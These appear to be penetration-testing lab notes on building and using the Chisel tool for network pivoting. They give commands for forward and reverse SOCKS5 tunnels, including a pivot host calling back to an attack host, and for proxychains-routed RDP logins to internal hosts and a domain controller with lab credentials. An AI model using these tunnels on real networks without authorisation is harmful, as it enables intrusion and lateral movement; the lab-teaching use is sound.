Chisel is a TCP/UDP-based tunneling tool written in Go that uses HTTP to transport data that is secured using SSH.
Chisel can create a client-server tunnel connection in a firewall restricted environment
Installing Chisel
git clone <https://github.com/jpillora/chisel.git>
We will need the programming language Go installed on our system to build the Chisel binary. With Go installed on the system, we can move into that directory and use go build to build the Chisel binary.
cd chisel
go build
Two beneficial resources to complement this particular concept are Oxdf's blog post "Tunneling with Chisel and SSF" and IppSec's walkthrough of the box Reddish. IppSec starts his explanation of Chisel, building the binary and shrinking the size of the binary at the 24:29 mark of his video.
Transferring it to Pivot Host
scp -r chisel/ ubuntu@10.129.202.64:~/
#Running Chisel Server on Pivot Host
./chisel server -v -p 1234 --socks5
#Running Chisel Client on Attack Host
./chisel client -v 10.129.202.64:1234 socks
As you can see in the above output, the Chisel client has created a TCP/UDP tunnel via HTTP secured using SSH between the Chisel server and the client and has started listening on port 1080
Editing proxychains.conf
we can modify our proxychains.conf file located at /etc/proxychains.conf and add 1080 port at the end so we can use proxychains to pivot using the created tunnel between the 1080 port and the SSH tunnel.
tail -f /etc/proxychains.conf
proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123
When the Chisel server has --reverse enabled, remotes can be prefixed with R to denote reversed. The server will listen and accept connections, and they will be proxied through the client, which specified the remote.
Reverse remotes specifying R:socks will listen on the server's default socks port (1080) and terminate the connection at the client's internal SOCKS5 proxy.
#Starting Chisel Server on Attack Host
sudo ./chisel server --reverse -v -p 1234 --socks5
#Starting Chisel Client on Pivot host using R:socks
./chisel client -v 10.10.14.69:1234 R:socks
#Edit proxychains file
tail -f /etc/proxychains.conf
#RDP into Domain Controller
proxychains xfreerdp /v:172.16.7.50 /u:victor /p:pass@123